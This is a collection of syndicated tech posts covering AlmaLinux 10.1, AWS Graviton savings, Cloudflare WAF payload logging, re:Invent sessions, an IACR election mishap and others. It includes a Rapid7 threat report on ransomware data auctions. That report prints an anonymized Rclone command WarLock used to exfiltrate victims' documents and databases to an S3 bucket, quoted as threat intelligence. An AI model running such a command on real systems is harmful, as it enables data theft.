AlmaLinux 10.1 released

Post Syndicated from jzb original https://lwn.net/Articles/1047763/

AlmaLinux 10.1 has been released. In
addition to providing binary compatibility with Red Hat Enterprise
Linux (RHEL) 10.1, the most notable feature in AlmaLinux 10.1 is
the addition of support
for Btrfs, which is not available in RHEL:

Btrfs support encompasses both kernel and userspace enablement, and it
is now possible to install AlmaLinux OS on a Btrfs filesystem from the
very beginning. Initial enablement was scoped to the installer and
storage management stack, and broader support within the AlmaLinux
software collection for Btrfs features is forthcoming.

In addition to Btrfs support, AlmaLinux OS 10.1 includes numerous
other improvements to serve our community. We have continued to extend
hardware support both by adding
drivers and by adding a secondary version of AlmaLinux OS and EPEL
to extend support of x86_64_v2 processors.

See the release
notes for a full list of changes.

How potential performance upside with AWS Graviton helps reduce your costs further

Post Syndicated from Markus Adhiwiyogo original https://aws.amazon.com/blogs/compute/how-potential-performance-upside-with-aws-graviton-helps-reduce-your-costs-further/

Amazon Web Services (AWS) provides many mechanisms to optimize the price performance of workloads running on Amazon Elastic Compute Cloud (Amazon EC2), and the selection of the optimal infrastructure to run on can be one of the most impactful levers. When we started building the AWS Graviton processor, our goal was to optimize AWS Graviton features and capabilities to deliver a processor that provides the best price performance across a broad array of cloud workloads running on Amazon EC2. That goal continues to be our guiding principle, and today customers who adopt AWS Graviton-based EC2 instances see up to 40% better price performance on their cloud workloads when compared to equivalent non-Graviton EC2 instances. The price performance improvement is the result of both the performance improvement and the lower price in using AWS Graviton-based instances.

Price performance blends the cost of infrastructure with the amount of work you can achieve with infrastructure usage. After talking to many AWS Graviton customers, we’ve learned that the cost savings go beyond the lower AWS Graviton-based instances price. Many AWS Graviton customers told us that the performance increase from AWS Graviton allows them to consume fewer computing hours than comparable non-Graviton instances for equivalent workload throughput. In turn, this leads to further cost reduction.

The following are some of examples from our customers:

  • Pinterest achieved 47% cost savings and 38% savings on compute resources while reducing carbon emissions by 62% for its web API workload.
  • SAP powers its SAP HANA Cloud with AWS Graviton to enhance its price performance by 35% while lowering carbon impact by 45%.
  • Sprinklr improved their machine learning (ML) inference workloads’ throughput by up to 20% while reducing costs by up to 25%.

You can find more customer examples in the AWS Graviton testimonials page.

To help organizations capture similar benefits, we’ve enhanced the AWS Graviton Savings Dashboard (GSD) with new features that account for both pricing and performance improvements. In the following section we explore these new capabilities and how they can help optimize your infrastructure costs.

Understanding performance-driven cost optimization in the GSD

The GSD helps organizations identify ideal workloads for AWS Graviton migration through automated resource matching and data-driven visualizations. You can learn the GSD details and setup in this AWS compute post.

Although the dashboard has traditionally focused on calculating direct cost savings from the AWS Graviton pricing advantages, we’ve observed that customers often experience more benefits when their applications perform more efficiently on AWS Graviton processors, leading to decreased compute resource usage. To better reflect these real-world scenarios, we’ve enhanced the dashboard with new features highlighting Normalized Instance Hours (NIH) analysis capabilities so that you can model potential savings based on both pricing benefits and compute hour reductions. Although this tool helps estimate potential savings, actual performance improvements can only be determined by testing your specific workloads on AWS Graviton instances. Performance is always workload and use case specific, so we encourage you to test your AWS Graviton-based workloads using the Optimization and Performance Runbook to help you determine the actual possible NIH percent reduction.

Key dashboard components

This section outlines the following three key dashboard components: NIH reduction analysis, enhanced cost analysis visualizations, and detailed savings analysis.

NIH reduction analysis

The dashboard now features a new slider that lets you model potential cost savings by inputting the percentage reduction in NIH. Many organizations have found it challenging to calculate their total possible savings since the benefits come from two sources: the lower instance pricing of AWS Graviton and the reduced compute hours.

You can use the slider to model different cost scenarios by adjusting a theoretical NIH reduction between 0% and 40%. You can use this slider to input NIH reductions validated through your workload testing, model the combined impact of both pricing benefits and reduced compute hours, and explore different scenarios to help prioritize which workloads to test first.

Figure 1: NIH slider location

Figure 1: NIH slider location

Assume that your testing shows that your workload runs just as effectively with 15% fewer normalized instance hours on AWS Graviton. You can now plug that exact number into the slider to see your modeled savings combining both pricing differences and compute hour reductions. Although we’ve heard success stories of significant reductions from customers, we recommend starting your initial estimate with a conservative 10% baseline and adjusting based on your own testing results.

Enhanced cost analysis visualizations

The dashboard presents key visualizations that demonstrate the direct relationship between NIH reduction and cost savings. First, you see the Potential Graviton Base Savings from pricing differences alone. In the following diagram, we can observe an example of $61.54K of cost savings from migrating to equivalent AWS Graviton instances. Next, the Estimated Additional Savings Due to Performance in the same diagram shows $42.40K in savings if your performance testing confirms a 15% NIH reduction in your workload. Finally, the dashboard sums these two values into the Total Potential Graviton Savings of $103.94K. The Total Potential Graviton Savings helps visualize how both pricing benefits and any validated compute hour reductions could contribute to your overall savings.

Figure 2: Visualization with relationship between NIH reduction and cost savings

Figure 2: Visualization with relationship between NIH reduction and cost savings

The Amortized Cost Breakdown and Normalized Instance Hrs Breakdown charts in the following figure show 6-month historical trends, helping you spot patterns such as seasonal spikes or high-usage periods. These patterns can help you identify where even small efficiency improvements might yield significant savings, for example, workloads with consistently high usage or predictable peak periods that would be good candidates for testing.

Figure 3: Amortized Cost, NIH, and Total Potential Savings Breakdown charts

Figure 3: Amortized Cost, NIH, and Total Potential Savings Breakdown charts

Detailed savings analysis

Building on our commitment to help customers optimize cloud costs, we’ve enhanced the Potential Graviton Savings Details table with two columns focused on performance-based savings modeling. The Estimated Additional Savings Due to Performance column shows the modeled savings based on your chosen NIH reduction percentage, while Total Potential Graviton Savings combines this with the base pricing benefits.

Figure 4: Potential Graviton Savings Details table

Figure 4: Potential Graviton Savings Details table

As you examine your current instance family, you can observe both baseline AWS Graviton savings and these added saving opportunities clearly laid out in a comprehensive breakdown. The analysis presents your total savings potential in both dollar amounts and percentages. This allows you to build a compelling business case for migration. Although this detailed breakdown provides valuable planning insights, remember that actual savings may vary depending on your specific workload patterns, implementation approaches, and operational considerations.

Conclusion

The Graviton Savings Dashboard (GSD) serves as a powerful analytics tool that streamlines your journey to cost-effective cloud computing. The GSD provides clear visualizations and interactive features to help you understand and maximize potential savings when migrating to AWS Graviton-based instances. To further explore the new features, navigate to the GSD interactive demo, where you can model an example of potential savings using the NIH reduction slider and detailed cost breakdowns.

Ready to explore how AWS Graviton can transform your infrastructure costs? Visit the GSD page to deploy or update your GSD dashboard. Access implementation guides, such as the CFM Technical Implementation Playbook (CFM TIPs), and start optimizing your cloud spend today with the enhanced capabilities of the GSD.

Over 85,000 AWS customers have discovered the benefits of AWS Graviton, with many completing their adoptions in just hours. We have created this resource guide so that you can accelerate your AWS Graviton adoption with minimal effort and enjoy significant price performance benefits.

“What I always tell customers is one week, one application, one engineer, and see what you can do. They always are pleasantly surprised by how much progress they can make. If you’re out there and you haven’t yet moved to AWS Graviton, what are you waiting for? Let’s make it happen!”

Dave Brown, VP, AWS Compute & ML Services

Important note about performance testing
The GSD does not attempt to estimate the potential NIH percent reduction or your workload’s performance when transitioned to AWS Graviton. You can use it to perform what-if analysis of your potential savings for a projected NIH percent reduction. In the absence of this variable, GSD only considers the price delta between instance types and misses an important contributor to the overall savings potential of AWS Graviton from the performance upside. Compute performance is always workload and use case specific, so we encourage you to test your AWS Graviton-based workloads using the Optimization and Performance Runbook to help you determine the actual possible NIH percent reduction.

[$] APT Rust requirement raises questions

Post Syndicated from jzb original https://lwn.net/Articles/1046841/

It is rarely newsworthy when a project or package picks up a new
dependency. However, changes in a core tool like Debian’s Advanced Package
Tool (APT) can have far-reaching effects. For example, Julian
Andres Klode’s declaration
that APT would require Rust in May 2026 means that a few of Debian’s
unofficial ports must either acquire a working Rust toolchain or
depend on an old version of APT. This has raised several questions
within the project, particularly about the ability of a single
maintainer to make changes that have widespread impact.

From Extortion to E-commerce: How Ransomware Groups Turn Breaches into Bidding Wars

Post Syndicated from Alexandra Blia original https://www.rapid7.com/blog/post/tr-extortion-ecommerce-ransomware-groups-turn-breaches-into-bidding-wars-research

Ransomware has evolved from simple digital extortion into a structured, profit-driven criminal enterprise. Over time, it has led to the development of a complex ecosystem where stolen data is not only leveraged for ransom, but also sold to the highest bidder. This trend first gained traction in 2020 when the Pinchy Spider group, better known as REvil, pioneered the practice of hosting data auctions on the dark web, opening a new chapter in the commercialization of cybercrime.

In 2025, contemporary groups such as WarLock and Rhysida have embraced similar tactics, further normalizing data auctions as part of their extortion strategies. By opening additional profit streams and attracting more participants, these actors are amplifying both the frequency and impact of ransomware operations. The rise of data auctions reflects a maturing underground economy, one that mirrors legitimate market behavior, yet drives the continued expansion and professionalization of global ransomware activity.

Anatomy of victim data auctions 

Most modern ransomware groups employ double extortion tactics, exfiltrating data from a victim’s network before deploying encryption. Afterward, they publicly claim responsibility for the attack and threaten to release the stolen data unless their ransom demand is met. This dual-pressure technique significantly increases the likelihood of payment.

In recent years, data-only extortion campaigns, in which actors forgo encryption altogether, have risen sharply. In fact, such incidents doubled in 2025, highlighting how the threat of data exposure alone has become an effective extortion lever. Most ransomware operations, however, continue to use encryption as part of their attack chain.

Certain ransomware groups have advanced this strategy by introducing data auctions when ransom negotiations with victims fail. In these cases, threat actors invite potential buyers, such as competitors or other interested parties, to bid on the stolen data, often claiming it will be sold exclusively to a single purchaser. In some instances, groups have been observed selling partial datasets, likely adjusted to a buyer’s specific budget or area of interest, while any unsold data is typically published on dark web leak sites.

This process is illustrated in Figure 1, under the assumption that the threat actor adheres to their stated claims. However, in practice, there is no guarantee that the stolen data will remain undisclosed, even if the ransom is paid. This highlights the inherent unreliability of negotiating with cybercriminals.

ransomware-extortion-ecommerce-diagram
Figure 1 – Victim data auctioning process

This auction model provides an additional revenue stream, enabling ransomware groups to profit from exfiltrated data even when victims refuse to pay. It should be noted, however, that such auctions are often reserved for high-profile incidents. In these cases, the threat actors exploit the publicity surrounding attacks on prominent organizations to draw attention, attract potential buyers, and justify higher starting bids.

This trend is likely driven by the fragmentation of the ransomware ecosystem following the recent disruption of prominent threat actors, including 8Base and BlackSuit. This shift in cybercrime dynamics is compelling smaller, more agile groups to aggressively compete for visibility and profit through auctions and private sales to maintain financial viability. The emergence of the Crimson Collective in October 2025 exemplified this dynamic when the group auctioned stolen datasets to the highest bidder. Although short-lived, this incident served as a proof of concept (PoC) for the growing viability of monetizing data exfiltration independently of traditional ransom schemes.

Threat actor spotlight

WarLock

The WarLock ransomware group has been active since at least June 2025. The group targets organizations across North America, Europe, Asia, and Africa, spanning sectors from technology to critical infrastructure. Since its emergence, WarLock has rapidly gained prominence for its repeated exploitation of vulnerable Microsoft SharePoint servers, leveraging newly disclosed vulnerabilities to gain initial access to targeted systems.

The group adopts double extortion tactics, exfiltrating data from the victim’s systems before deploying its ransomware variant. From a recent incident Rapid7 responded to, we observed the threat actor exfiltrating the data from a victim to an S3 bucket using the tool Rclone. An anonymized version of the command used by the threat actor can be found below:

Rclone.exe copy \\localdirectory :s3 -P –include “*.{pdf,ai,dwg,dxf,dwt,doc,docx,dwg,dwt,dws,shx,pat,lin,ctb,dxf,dwf,step,stl,dst,dxb,,stp,ipt,prt,iges,obj,xlsx,mdf,sql,doc,xls,sql,bak,sqlite,db,sqlite3,sdf,ndf,ldf,csv,mdf,dbf,ibd,myd,ppt,pptx}” -q –ignore-existing –auto-confirm –multi-thread-streams 11 –transfers 11 –max-age 500d –max-size 2000m

WarLock operates a dedicated leak site (DLS) on the dark web, where it lists its victims. From the outset of its operations, the group has auctioned stolen data, publishing only the unsold information online (Figure 2). The group further mentions that the exfiltrated data may be sold to third parties if the victim refuses to pay in their ransom note (Figure 3).

2-ransomware-purchased-data.png
Figure 2 – Example of purchased data

3-warlock-ransomware-ransom-note.png
Figure 3 – WarLock ransom note

Although WarLock shares updates on the progress and results of these auctions through its DLS, it also relies heavily on its presence on the RAMP4 cybercrime forum to attract potential buyers (Figure 4). This approach likely allows WarLock to reach a wider buyer base by publishing these posts under the relevant thread “Auction \ 拍卖会”. It should be noted that WarLock is assessed to be of Chinese origin, which is further supported by the Chinese-language reference in this thread title.

4-ransomware-auction-warlock.png
Figure 4 – Mention of an auction on WarLock’s DLS

Using the alias “cnkjasdfgd,” the group advertises details about the nature and volume of exfiltrated data, along with sample files (Figure 5). WarLock further directs interested buyers to its Tox account, a peer-to-peer encrypted messaging and video-calling platform, where the auctions appear to take place.

5-warlock-ramp4.png
Figure 5 – WarLock’s post on RAMP4

This approach appears to be highly effective for WarLock. Despite being a recent entrant to the ransomware ecosystem, the group has reportedly sold victim data in approximately 55% of its claimed attacks, accounting for 55 victims to date as of November 2025, demonstrating significant traction within underground markets. The remaining victims’ data has been publicly released on the group’s DLS, following unsuccessful ransom negotiations and a lack of interested buyers.

Rhysida

The Rhysida ransomware group was first identified by cybersecurity researchers in May 2023. The group primarily targets Windows operating systems across both public and private organizations in sectors such as government, defense, education, and manufacturing. Its operations have been observed in several countries, including the United Kingdom, Switzerland, Australia, and Chile. The threat actors portray themselves as a so-called “cybersecurity team” that assists organizations in securing their networks by exposing system vulnerabilities.

Rhysida maintains an active DLS, where it publishes data belonging to victims who refuse to pay the ransom, in alignment with double extortion tactics. Since at least June 2023, the group has also conducted data auctions via a dedicated “Auctions Online” section of its DLS. These auctions typically run for seven days, and Rhysida claims that each dataset is sold exclusively to a single buyer. As of mid-October 2025, the group was hosting five ongoing auctions, with starting prices ranging from 5 to 10 Bitcoin (Figure 6).

6-ransomware-auction-rhysida-dls.png
Figure 6 – Example of an auction on Rhysida’s DLS

Once the auction period ends, Rhysida publicly releases any unsold data on its DLS (Figure 7). Instead, if the auction is successful, the data is marked as “sold”, without being released on the group’s DLS (Figure 8). In many cases, the group publishes only a subset of the stolen data, often accompanied by the note “not sold data was published” (Figure 9).

7-data-release-ransomware-rhysida.png
Figure 7 – Example of full data release on Rhysida’s DLS

8-sold-data-rhysida.png
Figure 8 – Example of sold data on Rhysida’s DLS

9-partial-data-release-rhysida-ransomware.png
Figure 9 – Example of partial data release on Rhysida’s DLS

With 224 claimed attacks to date as of November 2025, approximately 67% resulting in full or partial data sales, auctions represent a significant additional revenue stream for Rhysida. The group’s auction model appears to be considerably more effective than WarLock’s (Figure 10), likely due to Rhysida’s established reputation within the cybercrime ecosystem and its involvement in several high-profile attacks.

10-ransomware-auction-outcomes-graph-chart.png
Figure 10 – Overview of auction outcomes

Conclusion

The cyber extortion ecosystem is undergoing a profound transformation, shifting from traditional ransom payments to a diversified, market-driven model centered on data auctions and direct sales. This evolution marks a turning point in how ransomware groups generate revenue, transforming what were once isolated extortion incidents into structured commercial transactions.

Groups such as WarLock and Rhysida exemplify this shift, illustrating how ransomware operations increasingly mirror illicit e-commerce ecosystems. By auctioning exfiltrated data, these actors not only create additional revenue streams but also reduce their dependence on ransom compliance, monetizing stolen data even when victims refuse to pay. This approach has proven particularly lucrative for these threat actors, likely setting a precedent for newer extortion groups eager to replicate their success.

As a result, proprietary and sensitive data, including personally identifiable and financial information, is flooding dark web marketplaces at an unprecedented pace. This expanding secondary market intensifies both the operational and reputational risks faced by affected organizations, extending the impact of an attack well beyond its initial compromise.

To adapt to this evolving threat landscape, organizations must move beyond reactive crisis management and embrace a proactive, intelligence-driven defense strategy. Continuous dark web monitoring, early breach detection, and the integration of cyber threat intelligence into response workflows are now essential. In a world where stolen data functions as a tradable commodity, resilience depends not on negotiation but on vigilance, preparedness, and rapid action.

Security updates for Monday

Post Syndicated from daroc original https://lwn.net/Articles/1047682/

Security updates have been issued by Fedora (calibre, chromium, cri-o1.32, cri-o1.33, cri-o1.34, dotnet10.0, dovecot, gnutls, gopass, gopass-hibp, gopass-jsonapi, kubernetes1.31, kubernetes1.32, kubernetes1.33, kubernetes1.34, and linux-firmware), Mageia (ffmpeg, kernel, kmod-xtables-addons & kmod-virtualbox, kernel-linus, konsole, and redis), Red Hat (bind and bind-dyndb-ldap and kernel), SUSE (act, alloy, amazon-ssm-agent, ansible-12, ansible-core, blender, chromium, cups-filters, curl, elfutils, expat, firefox, glib2, grub2, helm, kernel, libipa_hbac-devel, libxslt, nvidia-container-toolkit, ongres-scram, openexr, podman, poppler, runc, samba, sssd, thunderbird, and tomcat), and Ubuntu (cups-filters, linux, linux-aws, linux-gcp, linux-hwe-6.14, linux-oracle, linux-realtime, linux-oem-6.14, and linux-realtime-6.14).

Get better visibility for the WAF with payload logging

Post Syndicated from Paschal Obba original https://blog.cloudflare.com/waf-payload-logging/

As the surface area for attacks on the web increases, Cloudflare’s Web Application Firewall (WAF)  provides a myriad of solutions to mitigate these attacks. This is great for our customers, but the cardinality in the workloads of the millions of requests we service means that generating false positives is inevitable. This means that the default configuration we have for our customers has to be fine-tuned. 

Fine-tuning isn’t an opaque process: customers have to get some data points and then decide what works for them. This post explains the technologies we offer to enable customers to see why the WAF takes certain actions — and the improvements that have been made to reduce noise and increase signal.

The Log action is great — can we do more?

Cloudflare’s WAF protects origin servers from different kinds of layer 7 attacks, which are attacks that target the application layer. Protection is provided with various tools like:

These tools are built on the Rulesets engine. When there is a match on a Rule expression, the engine executes an action.

The Log action is used to simulate the behaviour of rules. This action proves that a rule expression is matched by the engine and emits a log event which can be accessed via Security Analytics, Security Events, Logpush or Edge Log Delivery.

Logs are great at validating a rule works as expected on the traffic it was expected to match, but showing that the rule matches isn’t sufficient, especially when a rule expression can take many code paths.

In pseudocode, an expression can look like:

If any of the http request headers contains an “authorization” key OR the lowercased representation of the http host header starts with “cloudflare” THEN log

The rules language syntax will be:

any(http.request.headers[*] contains "authorization") or starts_with(lower(http.host), "cloudflare")

Debugging this expression poses a couple of problems. Is it the left-hand side (LHS) or right-hand side (RHS) of the OR expression above that matches? Functions such as Base64 decoding, URL decoding, and in this case lowercasing can apply transformations to the original representation of these fields, which leads to further ambiguity as to which characteristics of the request led to a match.

To further complicate this, many rules in a ruleset can register matches. Rulesets like Cloudflare OWASP use a cumulative score of different rules to trigger an action when the score crosses a set threshold

Additionally, the expressions of the Cloudflare Managed and OWASP rules are private. This increases our security posture – but it also means that customers can only guess what these rules do from their titles, tags and descriptions. For instance, one might be labeled “SonicWall SMA – Remote Code Execution – CVE:CVE-2025-32819.”

Which raises questions: What part of my request led to a match in the Rulesets engine? Are these false positives? 

This is where payload logging shines. It can help us drill down to the specific fields and their respective values, post-transformation, in the rule that led to a match. 

Payload logging

Payload logging is a feature that logs which fields in the request are associated with a rule that led to the WAF taking an action. This reduces ambiguity and provides useful information that can help spot check false positives, guarantee correctness, and aid in fine-tuning of these rules for better performance.

From the example above, a payload log entry will contain either the LHS or RHS of the expression, but not both. 

How does payload logging work ?

The payload logging and Rulesets engines are built on Wirefilter, which has been explained extensively.

Fundamentally, these engines are objects written in Rust which implement a compiler trait. This trait drives the compilation of the abstract syntax trees (ASTs) derived from these expressions.

struct PayloadLoggingCompiler {
     regex_cache HashMap<String, Arc<Regex>>
}

impl wirefilter::Compiler for PayloadLoggingCompiler {
	type U = PayloadLoggingUserData
	
	fn compile_logical_expr(&mut self, node: LogicalExpr) -> CompiledExpr<Self::U> {
		// ...
		let regex = self.regex_cache.entry(regex_pattern)
		.or_insert_with(|| Arc::new(regex))
		// ...
	}

}

The Rulesets Engine executes an expression and if it evaluates to true, the expression and its execution context are sent to the payload logging compiler for re-evaluation. The execution context provides all the runtime values needed to evaluate the expression.

After re-evaluation is done, the fields involved in branches of the expression that evaluate to true are logged.

The structure of the log is a map of wirefilter fields and their values Map<Field, Value>

{

	“http.host”: “cloudflare.com”,
	“http.method”: “get”,
	“http.user_agent”: “mozilla”

}

Note: These logs are encrypted with the public key provided by the customer. 

These logs go through our logging pipeline and can be read in different ways. Customers can configure a Logpush job to write to a custom Worker we built that uses the customer’s private key to automatically decrypt these logs. The Payload logging CLI tool, Worker, or the Cloudflare dashboard can also be used for decryption.


What improvements have been shipped?

In wirefilter, some fields are array types. The field http.request.headers.names is an array of all the header names in a request. For example:

[“content-type”, “content-length”, “authorization”, "host"]

An expression that reads any(http.request.headers.names[*] contains “c”) will evaluate to true because at least one of the headers contains the letter “c”. With the previous version of the payload logging compiler, all the headers in the “http.request.headers.names” field will be logged since it’s a part of the expression that evaluates to true.  

Payload log (previous)

http.request.headers.names[*] = [“content-type”, “content-length”, “authorization”, "host"]

Now, we partially evaluate the array fields and log the indexes that match the expressions constraint. In this case, it’ll be just the headers that contain a “c”!

Payload log (new)

http.request.headers.names[0,1] = [“content-type”, “content-length”]

Operators

This brings us to operators in wirefilter. Some operators like “eq” result in exact matches, e.g. http.host eq “a.com”. There are other operators that result in “partial” matches – like “in”, “contains”, “matches” – that work alongside regexes.

The expression in this example: `any(http.request.headers[*] contains “c”)` uses a “contains” operator which produces a partial match. It also uses the “any” function which we can say produces a partial match, because if at least one of the headers contains a “c”, then we should log that header – not all the headers as we did in the previous version.

With the improvements to the payload logging compiler, when these expressions are evaluated, we log just the partial matches. In this case, the new payload logging compiler handles the “contains” operator similarly to the “find” method for bytes in the Rust standard library. This improves our payload log to:

http.request.headers.names[0,1] = [“c”, “c”]

This makes things a lot clearer. It also saves our logging pipeline from processing millions of bytes. For example, a field that is analyzed a lot is the request body — http.request.body.raw — which can be tens of kilobytes in size. Sometimes the expressions are checking for a regex pattern that should match three characters. In this case we’ll be logging 3 bytes instead of kilobytes!

Context

I know, I know, [“c”, “c”] doesn’t really mean much. Even if we’ve provided the exact reason for the match and are significantly saving on the volume of bytes written to our customers storage destinations, the key goal is to provide useful debugging information to the customer. As part of the payload logging improvements, the compiler now also logs a “before” and “after” (if applicable) for partial matches. The size for these buffers are currently 15 bytes each. This means our payload log now looks like:

http.request.headers[0,1] = [
    {
        before: null, // isnt included in the final log
        content: “c”, 
        after: “ontent-length”
    },
    {
        before: null, // isnt included in the final log
        content: “c”, 
        after:”ontent-type”
    }
]

Example of payload log (previous)


Example of payload log (new)


In the previous log, we have all the header values. In the new log, we have the 8th index which is a malicious script in a HTTP header. The match is on the “<script>” tag and the rest is the context which is the text in gray.      

Optimizations

Managed rules rely heavily on regular expressions to fingerprint malicious requests. Parsing and compiling these expressions are CPU-intensive tasks. As managed rules are written once and deployed across millions of zones, we benefit from compiling these regexes and caching them in memory. This saves us CPU cycles as we don’t have to re-compile these until the process restarts.

The Payload logging compiler uses a lot of dynamically sized arrays or vectors to store the intermediate state for these logs. Crates like smallvec are also used to reduce heap allocations.  

The infamous “TRUNCATED” value

Sometimes, customers see “truncated” in their payload logs. This is because every firewall event has a size limit in bytes. When this limit is exceeded, the payload log is truncated. 

Payload log (previous)


Payload log (new)


We have seen the p50 byte size of the payload logs shrink from 1.5 Kilobytes to 500 bytes – a 67% reduction! That means way fewer truncated payload logs.

What’s next?

We’re currently using a lossy representation of utf-8 strings to represent values. This means that non-valid utf-8 strings like multimedia are represented as U+FFFD unicode replacement characters. For rules that will work on binary data, the integrity of these values should be preserved with byte arrays or with a different serialization format.

The storage format for payload logging is JSON. We’ll be benchmarking this alongside other binary formats like CBOR, Cap’n Proto, Protobuf, etc., to see how much processing time this saves our pipeline. This will help us deliver logs to our customers faster, with the added advantage that binary formats can also help with maintaining a defined schema that will be backward compatible. 

Finally, payload logging only works with Managed rules. It will be rolled out to other Cloudflare WAF products like custom rules, WAF attack score, content scanning, Firewall for AI, and more.

An example of payload logging showing prompts containing PII, detected by Firewall for AI:


Why should I be excited?

Visibility into the actions taken by the WAF will give customers assurance that their rules or configurations are doing exactly what they expect. Improvements to the specificity of payload logging is a step in this direction — and in the pipeline are further improvements to reliability, latency, and expansion to more WAF products.

As this was a breaking change to the JSON schema, we’ve rolled this out slowly to customers with adequate documentation.

To get started and enable payload logging, visit our developer documentation.

Your Guide to the Developer Tools Track at AWS re:Invent 2025

Post Syndicated from Brian Beach original https://aws.amazon.com/blogs/devops/your-guide-to-the-developer-tools-track-at-aws-reinvent-2025/

AWS re:Invent 2025 is just around the corner, and if you’re a developer looking to level up your skills, the Developer Tool (DVT) track has an incredible lineup waiting for you. From CI/CD pipelines and full-stack development to Infrastructure as Code and AI-powered coding agents, this year’s sessions will help you build faster, smarter, and more efficiently. Here’s your essential guide to navigating the week.

Must-Attend Sessions

AWS re:Invent is a learning focused conference and the best place for developer to learn is in one of the roughly 75 sessions on the Developer Tools track. With breakout sessions, lightening talks, chalk talks, code talks, workshops, builder sessions, and meetups, you are sure to find a something that appeals the developer in you. Check you the event catalog, or start with these stand out sessions.

  • DVT202: Continuous integration and continuous delivery (CI/CD) on AWS – Learn about creating complete CI/CD pipelines using infrastructure as code on AWS, with hands-on insights into planning work, collaborating on code, and deploying applications. Mandalay Bay – Monday 10:00 AM
  • DVT203: AWS infrastructure as code: A year in review – Discover the latest features and improvements for AWS CloudFormation and AWS CDK, and learn how these tools can bring rigor, clarity, and reliability to your application development. MGM Grand – Monday 10:30 AM
  • DVT204: What’s new in full-stack AWS app development – Find out how AWS is evolving to help web developers deliver differentiating experiences at 10x speed with solutions that empower you to get started easily, ship quickly, and iterate rapidly. Mandalay Bay – Monday 12:00 PM
  • DVT209: Kiro: Your agentic IDE for spec-driven development – Explore how Kiro is revolutionizing development with spec-driven workflows, agent hooks, multimodal agent chat, and MCP support to help you go from idea to production faster. MGM Grand – Wednesday 11:30 AM
  • DVT405: From Code completion to autonomous agents: The evolution of software development – Journey through the evolution of AI-powered coding agents from inline code completion to sophisticated autonomous tools, grounded in empirical evidence and real-world applications. MGM Grand – Wednesday 3:00 PM
  • DVT207: Developer experience economics: moving past productivity metrics – Learn Amazon’s approach to understanding the impact of developer experience and tooling, and discover how to bring strategic thinking to your team’s developer experience improvements. Mandalay Bay – Tuesday 5:30 PM

House of Kiro

Start your journey at the House of Kiro in the Venetian. Walk through Kiro’s haunted house filled with developer nightmares and horrors, and explore how Kiro brings structure to coding chaos through spec-driven development, vibe coding, and agent hooks. If you survive the haunted house, you will be rewarded with Kiro swag.

Rustic wooden cabin structure with "KIRO" branding and ghost logo on the roof, featuring boarded-up windows with glowing purple light emanating from behind, creating a haunted house aesthetic with a front porch and chimney.

AWS Village

Visit the AWS Village in the Expo at the Venetian Level 2 Hall B to speak with me and other experts at either the Kiro kiosk or the Developer Tools kiosk, covering CodePipeline, CodeBuild, CloudFormation, CDK, and all the essential developer tools.

  • The Venetian, Monday, Dec 1: 4:00 PM – 7:00 PM
  • Tuesday, Dec 2: 10:00 AM – 6:00 PM
  • Wednesday, Dec 3: 10:00 AM – 6:00 PM
  • Thursday, Dec 4: 10:00 AM – 4:00 PM

AWS booth at a conference or trade show featuring the iconic AWS logo and smile design suspended above a multi-level exhibition space with purple and blue gradient lighting, surrounded by attendees exploring various demo stations.

Builders Loft

Located at the south end of the strip in Mandalay Bay, the Builders Loft offers a collaborative workspace with dedicated co-working spaces and meetup zones. Enjoy coffee, snacks, SWAG, and daily tech challenges for a chance to win AWS credits. Kiro experts will be at the builders loft Monday-Thursday:

  • 8:00 AM – 12:00 PM: Co-working space for one-on-one consultations
  • 12:00 PM – 1:00 PM: Daily meetup in the meetup space
  • 4:50 PM – 5:00 PM: Q&A in the whiteboard section

Isometric 3D rendering of an AWS re:Invent expo floor layout featuring purple and pink branded kiosks, blue seating areas with round tables, interactive display stations, and workspace zones in a modern conference environment.

Hands-On Challenges

Kiro’s Labyrinth

Stop by the Kiro kiosk in the Venetian Expo to participate in Kiro’s Labyrinth, a coding challenge where you’ll help Kiro escape from a spooky Halloween maze and win prizes. The Kiro code champions will be crowned in DVT221 at Mandalay Bay on Thursday at 11:30 AM.

Atmospheric 3D render of a medieval dungeon or castle interior with dramatic red and orange lighting from wall-mounted torches, featuring stone archways, staircases, cobblestone floors, and blue accent lighting creating a moody gaming environment.

Kiroween Hackathon

Build something wicked for Kiroween, the annual hackathon that started on Halloween and ends on Friday, December 5th—the last day of re:Invent. Need help? Visit us at in the Builder Loft in Mandalay Bay: Monday-Friday, 8:30 AM – 12:00 PM or the Developer Pavilion in Venetian whenever the Expo is open.

Purple banner with "KIROWEEN" text in white, flanked by three ghost characters including the Kiro ghost mascot, a mummy ghost, and a skeleton ghost, creating aHalloween-themed branding element.

Conclusion

Make the most of your re:Invent experience by attending these sessions, connecting with experts at the AWS Village and Builders Loft, and participating in hands-on challenges. Whether you’re interested in CI/CD, infrastructure as code, AI-powered development, or just want to network with fellow builders, the Developer Tools track has something for everyone. See you in Vegas!

IACR Nullifies Election Because of Lost Decryption Key

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2025/11/iacr-nullifies-election-because-of-lost-decryption-key.html

The International Association of Cryptologic Research—the academic cryptography association that’s been putting conferences like Crypto (back when “crypto” meant “cryptography”) and Eurocrypt since the 1980s—had to nullify an online election when trustee Moti Yung lost his decryption key.

For this election and in accordance with the bylaws of the IACR, the three members of the IACR 2025 Election Committee acted as independent trustees, each holding a portion of the cryptographic key material required to jointly decrypt the results. This aspect of Helios’ design ensures that no two trustees could collude to determine the outcome of an election or the contents of individual votes on their own: all trustees must provide their decryption shares.

Unfortunately, one of the three trustees has irretrievably lost their private key, an honest but unfortunate human mistake, and therefore cannot compute their decryption share. As a result, Helios is unable to complete the decryption process, and it is technically impossible for us to obtain or verify the final outcome of this election.

The group will redo the election, but this time setting a 2-of-3 threshold scheme for decrypting the results, instead of requiring all three

News articles.

Kатерино nomen

Post Syndicated from original https://www.toest.bg/katerino-nomen/

Kатерино nomen

Едно от предизвикателствата, с които редовно се сблъсквам в преводаческата си практика, е „пренасянето“ на имената на литературните герои от български на английски. Kакто е добре известно, по принцип правилото е личните имена да не се превеждат, с изключение на тези в детската и жанровата литература. Нерядко обаче, особено в литературата, която аз обичам да чета и превеждам (без тя да е детска или жанрова), имената на героите не са просто произволно дадени им от автора названия, с които читателят да ги идентифицира, a разкриват – чрез семантичния си заряд, фонетичното си звучене, някаква етимологична заигравка или друго намигване – важни аспекти от личността, характера, произхода и историята на героя и по този начин предоставят на читателя допълнителен интерпретативен ключ.

